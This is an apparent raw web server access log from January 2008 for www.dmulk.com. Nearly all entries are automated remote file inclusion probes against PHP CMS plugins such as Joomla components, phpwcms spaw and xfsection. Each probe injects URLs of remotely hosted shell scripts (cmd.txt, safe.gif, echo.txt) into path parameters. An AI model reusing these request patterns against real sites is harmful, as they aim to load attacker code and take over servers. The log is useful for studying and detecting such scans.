88.208.78.80 - - [25/Jan/2008:17:32:19 -0800] "GET /////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
88.208.78.80 - - [25/Jan/2008:17:32:19 -0800] "GET /logs/////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:17:36:33 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://indramayu.zzl.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:17:36:45 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://indramayu.zzl.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:17:38:35 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:17:38:35 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:17:38:36 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.44 - - [25/Jan/2008:17:40:36 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.194.210.35 - - [25/Jan/2008:17:42:54 -0800] "GET /logs/access_071230.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.10.250.90 - - [25/Jan/2008:17:42:54 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.194.210.35 - - [25/Jan/2008:17:42:54 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.194.210.35 - - [25/Jan/2008:17:42:54 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.10.250.90 - - [25/Jan/2008:17:42:55 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
12.10.250.90 - - [25/Jan/2008:17:42:58 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.dnwh.de/ultrastats/gamelogs1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
12.10.250.90 - - [25/Jan/2008:17:42:58 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.dnwh.de/ultrastats/gamelogs1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
81.3.86.86 - - [25/Jan/2008:17:43:54 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.48.1.236 - - [25/Jan/2008:17:45:38 -0800] "GET /logs/access_071220.log HTTP/1.1" 200 140699 "-" "oseowrqmsuoxp lhwvejkivekj" "www.dmulk.com"
80.247.71.13 - - [25/Jan/2008:17:50:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.242.169 - - [25/Jan/2008:17:54:50 -0800] "GET /logs/access_080112.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.169 - - [25/Jan/2008:17:54:50 -0800] "GET /modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.169 - - [25/Jan/2008:17:54:50 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.169 - - [25/Jan/2008:17:55:08 -0800] "GET /logs/access_080104.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.33.102 - - [25/Jan/2008:17:55:29 -0800] "GET /logs/access_071116.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.33.102 - - [25/Jan/2008:17:55:29 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.33.102 - - [25/Jan/2008:17:55:29 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.33.102 - - [25/Jan/2008:17:55:38 -0800] "GET /logs/access_071130.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.164.174 - - [25/Jan/2008:17:57:58 -0800] "GET /logs/access_080112.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.164.174 - - [25/Jan/2008:17:57:58 -0800] "GET /modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.164.174 - - [25/Jan/2008:17:57:58 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.164.174 - - [25/Jan/2008:17:57:59 -0800] "GET /logs/access_080104.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.66.215 - - [25/Jan/2008:17:58:40 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.33.102 - - [25/Jan/2008:17:58:45 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.3.251 - - [25/Jan/2008:17:59:17 -0800] "GET /logs/access_071110.log/!scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [25/Jan/2008:17:59:17 -0800] "GET /!scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [25/Jan/2008:17:59:18 -0800] "GET /logs/!scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [25/Jan/2008:17:59:21 -0800] "GET /logs/access_080101.log/!scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
222.237.78.72 - - [25/Jan/2008:17:59:29 -0800] "GET /logs/access_080112.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.237.78.72 - - [25/Jan/2008:17:59:29 -0800] "GET /modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.237.78.72 - - [25/Jan/2008:17:59:29 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.187.243 - - [25/Jan/2008:18:00:42 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [25/Jan/2008:18:00:42 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [25/Jan/2008:18:00:43 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
194.8.218.185 - - [25/Jan/2008:18:01:09 -0800] "GET /logs/access_080112.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.8.218.185 - - [25/Jan/2008:18:01:09 -0800] "GET /modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.8.218.185 - - [25/Jan/2008:18:01:09 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.8.218.185 - - [25/Jan/2008:18:01:10 -0800] "GET /logs/access_080104.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.187.243 - - [25/Jan/2008:18:01:43 -0800] "GET /logs/access_071229.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
222.237.78.72 - - [25/Jan/2008:18:03:26 -0800] "GET /logs/access_080104.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:18:04:18 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:18:04:18 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:18:04:18 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:18:04:19 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:18:04:19 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [25/Jan/2008:18:04:19 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:18:04:27 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://indramayu.zzl.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:18:05:13 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [25/Jan/2008:18:05:17 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [25/Jan/2008:18:05:17 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:18:05:25 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:18:07:25 -0800] "GET /logs/access_080112.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:18:07:25 -0800] "GET /modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:18:07:26 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:18:07:27 -0800] "GET /logs/access_080112.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:18:07:27 -0800] "GET /modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:18:07:28 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [25/Jan/2008:18:07:46 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dzieckowice.pl/wordpress-2.1.3/wp-content/plugins/banner/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
24.106.251.51 - - [25/Jan/2008:18:07:46 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dzieckowice.pl/wordpress-2.1.3/wp-content/plugins/banner/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:18:08:21 -0800] "GET /logs/access_080104.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [25/Jan/2008:18:08:25 -0800] "GET /logs/access_080104.log/modules/xfsection/modify.php?dir_module=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:18:10:47 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:18:10:48 -0800] "GET /modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:18:10:48 -0800] "GET /logs/modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:18:11:58 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://indramayu.zzl.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:18:12:37 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:18:12:37 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:18:12:38 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.118.239 - - [25/Jan/2008:18:12:43 -0800] "GET /modules/My_eGallery/index.php?basepath=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.20.61.43 - - [25/Jan/2008:18:14:52 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
69.20.61.43 - - [25/Jan/2008:18:14:53 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
69.20.61.43 - - [25/Jan/2008:18:14:53 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.20.61.43 - - [25/Jan/2008:18:14:53 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
81.92.204.1 - - [25/Jan/2008:18:14:59 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
81.92.204.1 - - [25/Jan/2008:18:14:59 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
81.92.204.1 - - [25/Jan/2008:18:14:59 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
81.92.204.1 - - [25/Jan/2008:18:14:59 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:18:15:02 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:18:15:02 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:18:15:03 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:18:15:03 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:18:15:11 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:18:15:11 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:18:15:11 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:18:15:12 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:18:15:12 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:18:15:12 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:18:15:13 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:18:15:13 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.35.191.126 - - [25/Jan/2008:18:15:29 -0800] "GET /modules/My_eGallery/index.php?basepath=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
90.185.233.233 - - [25/Jan/2008:18:15:31 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
90.185.233.233 - - [25/Jan/2008:18:15:31 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
90.185.233.233 - - [25/Jan/2008:18:15:35 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
90.185.233.233 - - [25/Jan/2008:18:15:35 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:18:16:21 -0800] "GET /logs/access_080101.log/modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
